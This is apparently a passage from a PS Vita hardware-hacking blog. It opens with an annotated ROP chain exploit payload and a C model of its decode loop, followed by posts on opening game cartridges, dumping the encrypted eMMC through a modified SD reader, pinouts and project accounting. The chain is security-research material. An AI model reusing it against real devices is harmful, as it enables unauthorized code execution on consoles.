0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
... END OF ROP PAYLOAD ...
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 
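The loop emulation at the end of the chain is easier to follow as ordinary code. The sketch below models only the arithmetic, based on my annotations above: after the buffer pointer is advanced, 0xF70FB000 is added to it, the "next stage" address is stored unconditionally into the LR slot, and the loop address is stored over it only when the sum is non-zero. The function names are invented, and the gadgets' real flag handling may differ in detail.

```c
#include <assert.h>
#include <stdint.h>

#define BUFFER_START 0x08F01000u /* start of the decoded buffer */
#define LOOP_ADDEND  0xF70FB000u /* constant popped into R1 before the test */
#define ROP_LOOP     0x08B474A8u /* START_DECODE_LOOP in the chain */
#define NEXT_STAGE   0x08F00FFCu /* stack pointer used once decoding is done */

/* Value left in the LR slot (and then moved to SP) for a given pointer. */
uint32_t next_stack_pointer(uint32_t buffer_ptr)
{
    uint32_t sum = buffer_ptr + LOOP_ADDEND; /* wraps to 0 at buffer end */
    uint32_t target = NEXT_STAGE;            /* unconditional store */

    if (sum != 0)
        target = ROP_LOOP;                   /* conditional store */
    return target;
}

/* Count how many words get decoded before the chain falls through. */
unsigned count_iterations(void)
{
    uint32_t ptr = BUFFER_START;
    unsigned n = 0;

    do {
        ptr += 4; /* the chain advances the pointer before testing it */
        n++;
    } while (next_stack_pointer(ptr) == ROP_LOOP);
    return n;
}
```

The sum only reaches zero when the pointer is 0x08F05000, so `count_iterations()` returns 0x1000, which is the 0x4000-byte buffer divided into 4-byte words.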

How to Disassemble Vita Game Cartridges

A hacker named katsu recently released a method for dumping Vita games. As a developer, I am completely against piracy, but as a reverse engineer I can’t shy away from taking apart perfectly working devices. However, most pictures I see of Vita game carts taken apart show the game cart casing damaged beyond repair or completely destroyed. I managed to take apart a game cart and put it together with no obvious signs of damage, and I thought I would share my (simple) method here.

If you take a look at the top right or left corner of the game cart, you can see a line where the two halves of the plastic were glued together. Locate the upper left corner and, with a sharp knife, push the blade into the line on the corner until you have a small dent. Then, move the knife downwards and wiggle it until you loosen the glue along the entire left side of the cart. Keep moving the knife down and, when you hit the bottom of the cart, turn and loosen about half the bottom edge of the cart. Now you can use your fingers to spread the two halves apart (but be careful not to use too much force and tear the glue from the other two edges), and you can either shake the memory chip out or use a pair of tweezers.

If you were to follow katsu’s pinout, you need to solder to the copper pads. A trick for doing so is to first flux up the points and then melt a pea-sized blob of solder in the middle of all the points. Then take your iron and spread the blob around until all the pads are soldered up. Then just make sure the remaining blob is not on top of any copper and you can easily remove it.

Then you can solder wires onto the points to your heart’s content. After you’re done with everything, you can easily put the memory chip back into the casing and there is enough glue to keep the two halves of the case together (along with the memory chip). You can then continue to play the game.

Pinout for Vita game cart. Credits to katsu.

If you were to follow the pinout, you can see that it appears to be a standard NAND pinout (not eMMC and not Memory Stick Duo). I have not tested this, but I believe this means you can use NANDWay or any other NAND dumping technique (there’s lots for PS3 and Xbox 360) provided you attach to the right pins. I suspect that the Vita communicates with the game cart through the SD protocol with an additional line for a security interface, but that is just speculation. If that were the case, having one-to-one dumps would not allow you to create clone games. Regardless, I will not be looking too much into game carts because they are so closely tied with piracy.

Dumping the Vita NAND

When we last left off, I had spent in excess of 100 hours (I’m not exaggerating: that entire time I was working, I listened to This American Life and went through over a hundred one-hour episodes) soldering and tinkering with the Vita logic board to try to dump the eMMC. I said I was going to buy an eMMC socket from taobao (the socket would have let me clamp an eMMC chip down while pins stick out, allowing the pressure to create a connection). However, I found out that none of the taobao sellers of the eMMC socket ship to the USA, and American retailers sell the sockets for $300 (cheapest I could find). So I took another approach.

Packet Sniffing

My first hypothesis on why it is not working is that there’s some special initialization command that the eMMC requires. For example, CMD42 of the MMC protocol allows password protection on the chip. Another possibility was that the chip resets into boot mode, which the SD card reader doesn’t understand. To clear any doubts, I connected CLK, CMD, and DAT0 to my Saleae Logic clone I got from eBay.

Vita eMMC points connected to logic analyzer.

As you can see from the setup, I had the right controller board attached so I can get a power indicator light (not required, but useful). I also took the power button out of the case and attached it directly. The battery must be attached for the Vita to turn on. Everything is Scotch-taped to the table so it won’t move around. Once all that is done, I captured the Vita’s eMMC traffic on startup.

First command sent to eMMC on startup

After reading the 200-page eMMC specification, I understood the protocol and knew what I was looking at. The very first command sent to the eMMC is CMD0 with argument 0x00000000 (GO_IDLE_STATE). This is significant for two reasons. First, we know that the Vita does NOT use the eMMC’s boot features. The Vita does not have its first stage bootloader on the eMMC, and boots either from (most likely) an on-chip ROM or (much less likely) some other chip (that mystery chip on the other side maybe?). Second, it means that there’s no trickery; the eMMC is placed directly into Idle mode, which is what SD cards go into when they are inserted into a computer. This also means that the first data read from the eMMC is in the user partition (not boot partition), so the second or third stage loader must be in the user partition of the eMMC. For the unfamiliar, the user partition is the “normal” data that you can see at any point while the boot partition is a special partition only exposed in boot mode (and AFAIK, not supported by any USB SD card reader). Because I don’t see the boot partition used, I never bothered to try to dump it.
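When reading a capture like this, it helps to know what the 48 bits on the CMD line should look like. The sketch below builds a command frame following the standard MMC/SD command format (start bit, transmission bit, 6-bit command index, 32-bit argument, CRC7, end bit). The helper names are mine and this is not code from any particular reader or host controller.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* CRC7 with polynomial x^7 + x^3 + 1, as used on the MMC/SD CMD line. */
uint8_t crc7(const uint8_t *data, size_t len)
{
    uint8_t crc = 0;
    size_t i;
    int bit;

    for (i = 0; i < len; i++) {
        uint8_t d = data[i];
        for (bit = 0; bit < 8; bit++) {
            crc <<= 1;
            if ((d & 0x80) ^ (crc & 0x80))
                crc ^= 0x09;
            d <<= 1;
        }
    }
    return crc & 0x7F;
}

/* Build the 6-byte frame the host shifts out for a command. */
void mmc_command_frame(uint8_t index, uint32_t arg, uint8_t frame[6])
{
    assert(index < 64);
    frame[0] = (uint8_t)(0x40 | index); /* start bit 0, transmission bit 1 */
    frame[1] = (uint8_t)(arg >> 24);    /* argument, most significant first */
    frame[2] = (uint8_t)(arg >> 16);
    frame[3] = (uint8_t)(arg >> 8);
    frame[4] = (uint8_t)arg;
    frame[5] = (uint8_t)((crc7(frame, 5) << 1) | 1); /* CRC7 + end bit */
}
```

For CMD0 with a zero argument, `mmc_command_frame(0, 0, frame)` produces 40 00 00 00 00 95, which is the pattern to look for at the start of the trace.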

Dumping

I tried a dozen times last week on two separate Vita logic boards to dump the NAND with no luck. Now that I’m on my third (and final) Vita, I decided to try something different. First, I did not remove the resistors sitting between the SoC and eMMC this time. This is because I wanted to capture the traffic (see above) and also because I am much better at soldering now and the tiny points don’t scare me anymore. Second, because of my better understanding of the MMC protocol (from the 200-page manual I read), I no longer attempted to solder DAT1-DAT3 because that takes more time and gives more chance of error due to bad connections. I only connected CLK, CMD, and DAT0. I know that on startup, the eMMC is placed automatically into 1-bit read mode and must be switched to 4-bit (DAT0-DAT3) or 8-bit (DAT0-DAT7) read mode after initialization. My hypothesis was that there must be an SD card reader that follows the specification’s recommendation and dynamically chooses the bus width based on how many wires can be read correctly (I also guessed that most readers don’t do this because SD cards always have four data pins). To test this, I took a working SD card, and insulated the pins for DAT1-DAT3 with tape. I had three SD card readers and the third one worked! I now knew that this reader can operate in 1-bit mode, so I took it apart and connected it to the Vita (CLK, CMD, DAT0, and ground).

As you can see, more tape was used to secure the reader.

I plugged it into the computer and… nothing. I also saw that the LED read indicator on the reader was not on, and a multimeter showed that the reader was not outputting any power either. That’s weird. I then put a working SD card in and the LED light turned on. I had an idea. I took the SD card and insulated every pin except Vdd and Vss/GND (taped over every other pin) and inserted the SD card into the reader. The LED light came on. I guess there’s an internal switch that gets turned on when it detects a card is inserted because it tries to draw power (I’m not hooking up Vdd/Vss to the Vita because that’s more wires and I needed a 1.8V source for the controller and it’s just a lot of mess; I’m using the Vita’s own voltage source to power the eMMC). I then turned on the Vita, and from the flashing LED read light, I knew it was successful.

LED is on and eMMC is being read

Analyzing the NAND

Here’s what OSX has to say about the eMMC:

Product ID: 0x4082
Vendor ID: 0x1e3d (Chipsbrand Technologies (HK) Co., Limited)
Version: 1.00
Serial Number: 013244704081
Speed: Up to 480 Mb/sec
Manufacturer: ChipsBnk
Location ID: 0x1d110000 / 6
Current Available (mA): 500
Current Required (mA): 100
Capacity: 3.78 GB (3,779,067,904 bytes)
Removable Media: Yes
Detachable Drive: Yes
BSD Name: disk2
Partition Map Type: Unknown
S.M.A.R.T. status: Not Supported

I used good-old “dd” to copy the entire /dev/rdisk2 to a file. It took around one and a half hours to read (1-bit mode is very slow) the entire eMMC. I opened it up in a hex editor and as expected the NAND is completely encrypted. To verify, I ran a histogram on the dump and got the following result: 78.683% byte 0xFF and almost exactly 00.084% for every other byte. 0xFF blocks indicate free space and such an even distribution of all the other bytes means that the file system is completely encrypted. For good measure, I also ran “strings” on it and could not find any readable text. If we assume that there’s a 78.600% free space on the NAND (given 0xFF indicates free space and we have an even distribution of encrypted bytes in non-free space), that means that 808.70MB of the NAND is used. That’s a pretty hefty operating system in comparison to PSP’s 21MB flash0.
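The histogram and the free-space estimate are both easy to reproduce. Below is a rough sketch: the function names are mine, and the estimate assumes (as I did above) that encrypted data contributes its fair share of 0xFF bytes, so the free fraction is the 0xFF share minus the average share of any other byte value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Count how often each byte value occurs in a chunk of the dump. */
void byte_histogram(const uint8_t *data, size_t len, uint64_t counts[256])
{
    size_t i;

    for (i = 0; i < 256; i++)
        counts[i] = 0;
    for (i = 0; i < len; i++)
        counts[data[i]]++;
}

/*
 * Estimate how many bytes hold (encrypted) data.
 * ff_fraction:    share of bytes equal to 0xFF (0.0 to 1.0)
 * other_fraction: average share of each other byte value
 * capacity_bytes: total size of the dump
 */
double estimate_used_bytes(double ff_fraction, double other_fraction,
                           double capacity_bytes)
{
    double free_fraction = ff_fraction - other_fraction;

    assert(free_fraction >= 0.0 && free_fraction <= 1.0);
    return (1.0 - free_fraction) * capacity_bytes;
}
```

Calling `estimate_used_bytes(0.78683, 0.00084, 3779067904.0)` gives about 809 million bytes, in line with the figure above. For a dump this size, `byte_histogram` would be called on fixed-size chunks read from the file, with the per-chunk counts summed.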

What’s Next

It wasn’t a surprise that the eMMC is completely encrypted. That’s what everyone suspected for a while. What would have been surprising is if it WASN’T encrypted, and that tiny hope was what fueled this project. We now know for a fact that modifying the NAND is not a viable way to hack the device, and it’s always good to know something for sure. For me, I learned a great deal about hardware and soldering and interfaces, so in my free time, I’ll be looking into other things like the video output, the mystery connector, the memory card, and the game cards. I’ve also sent the SoC and the two eMMC chips I removed to someone for decapping, so we’ll see how that goes once the process is done. Meanwhile, I’ll also work more with software and try some ideas I picked up from the WiiU 30C3 talk. Thanks again to everyone who contributed and helped fund this project!

Accounting

In the spirit of openness, here’s all the money I’ve received and spent over the duration of this hardware hacking project:

Collected: $110 WePay, $327.87 PayPal, and 0.1BTC

Assets

Logic Analyzer: $7.85
Broken Vita logic board: $15.95
VitaTV x 2 (another for a respected hacker): $211.82
Rework station: $80
Broken 3G Vita: $31
Shipping for Chips to be decapped: $1.86

Total: $348.48 (I estimated/asked for $380)

I said I will donate the remaining money to EFF. I exchanged the 0.1BTC to USD and am waiting for mtgox to verify my account so I can withdraw it. $70 of donations will not be given to the EFF by the request of the donor(s). I donated $25 to the EFF on January 10, 2014, 9:52 pm and will donate the 0.1BTC when mtgox verifies my account (this was before I knew that EFF takes BTC directly).

PS Vita NAND Pinout (Updated)

Since the last post on the eMMC pinout, I found the other two important test points. The first is VCCQ, which powers the eMMC controller. It needs to be pulled to 1.8V. The other is VCC, which powers the actual NAND flash. It needs to be pulled to 3.3V.

Found on the bottom of the board, above the SoC

Found on the bottom of the board, near the multi-connector

For reference, the pad of the removed eMMC on the second Vita


Random observations on Vita logic board

While I’m waiting for more tools to arrive, here are some things I’ve found while playing around with the continuity test on a multimeter. There is no stunning discovery here, just bits and pieces of thoughts that may not be completely accurate.

On Video Out

The unfilled pads next to the eMMC have something to do with video. The traces run from the SoC toward the video connector. A continuity test shows that all the pads come from the SoC and lead to some point on the video connector. Could they be pads used for testing video in the factory? The VitaTV teardown from 4gamer.net shows that traces coming out of the SoC in a similar location go through similar-looking components and then into the op-amp and on to the HDMI connector. This is a stretch, but could these traces output HDMI if connected properly? As a side note, I could not find any direct connection between anything on the video connector and either the mystery port or the multi-connector. If Sony were to ever produce a video-out cable, it would need a software update, as there doesn’t seem to be hardware support.

On the Mystery Port and USB

The first two pins on the mystery port appear to be ground (or Vdd and Vss). The last pin could be a power source. Pins 3 and 4 go through a component and directly into the SoC. What’s interesting is that the D+/D- USB lines from the multi-connector on the bottom go through a similar-looking component, and that they are very close to the pins that handle the mystery port. Looking at 4gamer.net’s VitaTV teardown again, we see that the USB input port has two lines that take a very similar path (through the same kinds of components) to the Vita’s USB output, but the traces enter the SoC on the VitaTV at the same position as the traces coming from the mystery port on the Vita. Could the mystery port be a common USB host/USB OTG port with a custom plug?

On the Mystery Chip

4gamer.net also speculates that the SCEI chip on the top of the board has something to do with USB, but I don’t think that’s true because the USB lines go directly into the SoC. That means we still don’t know what the SCEI chip does (it is the only chip on the board that has yet to be identified by any source). My completely baseless hypothesis is that it’s the syscon, because it would be reasonable for the syscon to sit outside of the SoC, since it would decide when to power on the SoC.

On the eMMC

This may be public knowledge but the Vita’s eMMC NAND is 4GB (same as VitaTV and Vita Slim). The new Vitas do not have any additional storage chips. This also means that the 1GB internal storage on the new Vitas is just another partition or something on that NAND (no hardware changes).

PS Vita NAND Pinout

Vita NAND Pinout

As promised, here’s the pinout for the Vita’s eMMC (NAND). Don’t be fooled by the picture; the resistors are TINY. Plus, if you noticed, half the traces are almost hugging the shield base (which is pretty hard to remove without disturbing the resistors). I hope I can find a better way to dump the eMMC than soldering to these points. It’s doubtful that they are exposed elsewhere, as I’ve checked every unfilled pad on both sides of the board. Wish me luck…

To get an idea of where these resistors are located, check the iFixit picture for reference (black box is where they are).

Comparison

To get an idea of the size of the resistors, I’ve placed a 0.7mm pencil lead next to them.

 
